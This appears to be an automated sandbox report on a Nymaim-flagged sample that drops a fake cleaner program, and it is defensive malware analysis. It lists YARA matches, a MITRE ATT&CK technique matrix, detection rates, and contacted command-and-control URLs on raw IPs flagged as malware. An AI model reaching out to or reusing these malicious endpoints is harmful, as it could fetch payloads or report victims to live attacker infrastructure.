Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Nymaim

Source: Yara match	File source: 0.0.file.exe.21d0e67.30.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.21d0e67.18.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.23.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.21d0e67.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.21.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.19.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.31.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.file.exe.2210000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.21d0e67.26.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.21d0e67.16.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.25.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.21d0e67.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.21d0e67.30.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.21d0e67.24.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.21d0e67.28.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.17.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.21d0e67.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.21d0e67.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.31.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.21d0e67.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.21.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.21d0e67.24.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.21d0e67.32.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.15.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.21d0e67.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.21d0e67.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.21d0e67.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.21d0e67.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.21d0e67.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.27.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.21d0e67.32.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.29.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.21d0e67.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.29.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.21d0e67.28.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.21d0e67.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.21d0e67.20.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.21d0e67.18.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.21d0e67.20.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.21d0e67.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.21d0e67.22.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.19.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.21d0e67.22.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.25.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.21d0e67.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.15.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.17.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.file.exe.2210000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.27.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.21d0e67.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.23.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.21d0e67.16.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.286250062.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.279758880.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.256985084.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.265693702.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.260710969.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.284332741.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.280078685.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.284940570.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.279213027.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.248974366.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.242858773.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.249420938.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.242004728.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.261380699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.285645764.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.279479542.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.252652451.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.242267138.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.241291964.0000000002210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.256739991.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.265965257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.267422154.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.242584776.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.265443636.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.261862995.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.249185873.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.248750615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.256511336.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.252969697.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.260976008.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.253211211.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.257226679.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.252332121.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Windows Management Instrumentation	Path Interception	12 Process Injection	11 Masquerading	OS Credential Dumping	111 Security Software Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	11 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	11 Disable or Modify Tools	LSASS Memory	2 Process Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	11 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	21 Virtualization/Sandbox Evasion	Security Account Manager	21 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	2 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	12 Process Injection	NTDS	1 Remote System Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	123 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	1 System Network Configuration Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	2 Software Packing	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 Timestomp	DCSync	14 System Information Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
file.exe	48%	ReversingLabs	Win32.Trojan.Generic
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\dll[1]	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\dll[1]	0%	Metadefender		Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\soft[1]	29%	ReversingLabs	Win32.Trojan.Lazy
C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Bunifu_UI_v1.5.3.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Bunifu_UI_v1.5.3.dll	0%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	29%	ReversingLabs	Win32.Trojan.Lazy

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
0.0.file.exe.400000.21.unpack	100%	Avira	HEUR/AGEN.1250671		Download File
0.0.file.exe.400000.31.unpack	100%	Avira	HEUR/AGEN.1250671		Download File
0.0.file.exe.400000.7.unpack	100%	Avira	HEUR/AGEN.1250671		Download File
0.0.file.exe.400000.19.unpack	100%	Avira	HEUR/AGEN.1250671		Download File
0.0.file.exe.400000.5.unpack	100%	Avira	HEUR/AGEN.1250671		Download File
0.0.file.exe.400000.23.unpack	100%	Avira	HEUR/AGEN.1250671		Download File
0.0.file.exe.400000.13.unpack	100%	Avira	HEUR/AGEN.1250671		Download File
0.0.file.exe.400000.25.unpack	100%	Avira	HEUR/AGEN.1250671		Download File
0.0.file.exe.400000.9.unpack	100%	Avira	HEUR/AGEN.1250671		Download File
0.0.file.exe.400000.1.unpack	100%	Avira	HEUR/AGEN.1250671		Download File
0.0.file.exe.400000.17.unpack	100%	Avira	HEUR/AGEN.1250671		Download File
0.0.file.exe.400000.11.unpack	100%	Avira	HEUR/AGEN.1250671		Download File
0.0.file.exe.400000.15.unpack	100%	Avira	HEUR/AGEN.1250671		Download File
0.0.file.exe.400000.29.unpack	100%	Avira	HEUR/AGEN.1250671		Download File
0.0.file.exe.400000.27.unpack	100%	Avira	HEUR/AGEN.1250671		Download File
0.0.file.exe.400000.3.unpack	100%	Avira	HEUR/AGEN.1250671		Download File

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&substream=mixinte	100%	URL Reputation	malware
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://ctldl.windowsup	0%	URL Reputation	safe
https://take.rdrct-now.online/go/ZWKA?p78705p298845p1174	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.carterandcone.com	0%	URL Reputation	safe
http://www.carterandcone.com.	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=mixtwo&substream=mixinte	100%	URL Reputation	malware
http://www.jiyu-kobo.co.jp/.	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.de	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://107.182.129.235/storage/ping.php	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.fontbureau.comH	0%	URL Reputation	safe
http://107.182.129.235/storage/extension.php	0%	URL Reputation	safe
http://85.31.46.167/software.php	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/H	0%	URL Reputation	safe
http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&subst	100%	URL Reputation	malware
http://www.jiyu-kobo.co.jp/jp/	0%	URL Reputation	safe
https://iplogger.orgx	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/x	0%	URL Reputation	safe
http://www.founder.com.cn/cn8	0%	URL Reputation	safe
https://g-cleanit.hk	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.zhongyicts.com.cno.	0%	URL Reputation	safe
http://171.22.30.106/library.php	100%	URL Reputation	malware
http://www.sajatypeworks.comb.	0%	Avira URL Cloud	safe
http://www.typography.net.	0%	Avira URL Cloud	safe
http://www.sakkal.comx	0%	Avira URL Cloud	safe
http://www.fontbureau.comF.	0%	Avira URL Cloud	safe
http://www.fontbureau.comitu8	0%	Avira URL Cloud	safe
http://www.typography.net.	0%	Virustotal		Browse
http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&substream=mixinteIN	100%	Avira URL Cloud	malware
http://www.fontbureau.comvaRegular	0%	Avira URL Cloud	safe
http://www.ccleaner.comqhttps://take.rdrct-now.online/go/ZWKA?p78705p298845p1174	0%	Avira URL Cloud	safe
http://www.zhongyicts.com.cno.X	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/F.	0%	Avira URL Cloud	safe
http://www.typography.netTTF.	0%	Avira URL Cloud	safe
http://www.sandoll.co.kralRegular	0%	Avira URL Cloud	safe
http://www.typography.netF.	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
iplogger.org	148.251.234.83	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&substream=mixinte	true	URL Reputation: malware	unknown
http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=mixtwo&substream=mixinte	true	URL Reputation: malware	unknown
http://107.182.129.235/storage/ping.php	false	URL Reputation: safe	unknown
http://107.182.129.235/storage/extension.php	false	URL Reputation: safe	unknown
http://85.31.46.167/software.php	true	URL Reputation: safe	unknown
https://iplogger.org/1Pz8p7	false		high
http://171.22.30.106/library.php	true	URL Reputation: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.fontbureau.com/designersG	Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers/?	Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/bThe	Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://ctldl.windowsup	file.exe, 00000000.00000000.286113047.0000000000663000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers?	Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.comitu8	Cleaner.exe, 0000001E.00000003.364938213.0000022E6B03F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://take.rdrct-now.online/go/ZWKA?p78705p298845p1174	Cleaner.exe, 0000001E.00000002.631260958.0000022E00001000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.tiro.com	Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers	Cleaner.exe, 0000001E.00000003.372842971.0000022E6B05D000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.goodfont.co.kr	Cleaner.exe, 0000001E.00000003.359574972.0000022E6B03B000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.carterandcone.com	Cleaner.exe, 0000001E.00000003.361219972.0000022E6B040000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 0000001E.00000003.361078584.0000022E6B040000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designersiva	Cleaner.exe, 0000001E.00000003.372842971.0000022E6B05D000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.sakkal.comx	Cleaner.exe, 0000001E.00000003.362419891.0000022E6B026000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.carterandcone.com.	Cleaner.exe, 0000001E.00000003.361219972.0000022E6B040000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sajatypeworks.com	Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://www.typography.netD	Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn/cThe	Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sajatypeworks.comb.	Cleaner.exe, 0000001E.00000003.357923180.0000022E6B025000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://fontfabrik.com	Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com.	Cleaner.exe, 0000001E.00000003.365381080.0000022E6B03F000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 0000001E.00000003.365415203.0000022E6B03F000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 0000001E.00000003.366231899.0000022E6B025000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 0000001E.00000003.365464280.0000022E6B03F000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 0000001E.00000003.364887394.0000022E6B03F000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.jiyu-kobo.co.jp/.	Cleaner.exe, 0000001E.00000003.362097359.0000022E6B03E000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.galapagosdesign.com/DPlease	Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fonts.com	Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sandoll.co.kr	Cleaner.exe, 0000001E.00000003.359574972.0000022E6B03B000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.urwpp.deDPlease	Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.urwpp.de	Cleaner.exe, 0000001E.00000003.367409088.0000022E6B05D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Cleaner.exe, 0000001E.00000002.631260958.0000022E00001000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sakkal.com	Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.typography.net.	Cleaner.exe, 0000001E.00000003.358138566.0000022E6B040000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 0000001E.00000003.358211225.0000022E6B040000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 0000001E.00000003.358174176.0000022E6B040000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.fontbureau.comF.	Cleaner.exe, 0000001E.00000003.366231899.0000022E6B025000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&substream=mixinteIN	file.exe, 00000000.00000000.286113047.0000000000663000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000000.279933925.0000000000663000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000000.266426572.0000000000663000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.apache.org/licenses/LICENSE-2.0	Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com	Cleaner.exe, 0000001E.00000003.365415203.0000022E6B03F000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 0000001E.00000003.364887394.0000022E6B03F000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.comH	Cleaner.exe, 0000001E.00000003.364960603.0000022E6B03F000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 0000001E.00000003.364938213.0000022E6B03F000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.zhongyicts.com.cno.X	Cleaner.exe, 0000001E.00000003.360922906.0000022E6B03E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.comvaRegular	Cleaner.exe, 0000001E.00000003.364466049.0000022E6B03E000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 0000001E.00000003.364386372.0000022E6B02F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/H	Cleaner.exe, 0000001E.00000003.361876984.0000022E6B030000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&subst	file.exe, 00000000.00000000.265432136.000000000019B000.00000004.00000010.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
http://www.ccleaner.comqhttps://take.rdrct-now.online/go/ZWKA?p78705p298845p1174	file.exe, 00000000.00000003.329174439.0000000003B66000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.322735199.0000000003735000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.330761545.0000000003960000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.298651598.00000000031EF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.331371122.0000000003B95000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.323082305.000000000390E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.323416274.0000000003AF9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.328400230.0000000003943000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.324070957.000000000373E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.327501854.0000000003946000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.330045945.0000000003734000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.325291539.000000000392E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.327061375.000000000373D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.327857443.0000000003735000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.326688973.0000000003B2B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.332041691.0000000003735000.00000004.00000800.00020000.00000000.sdmp, soft[1].0.dr, Cleaner.exe.0.dr	false	Avira URL Cloud: safe	unknown
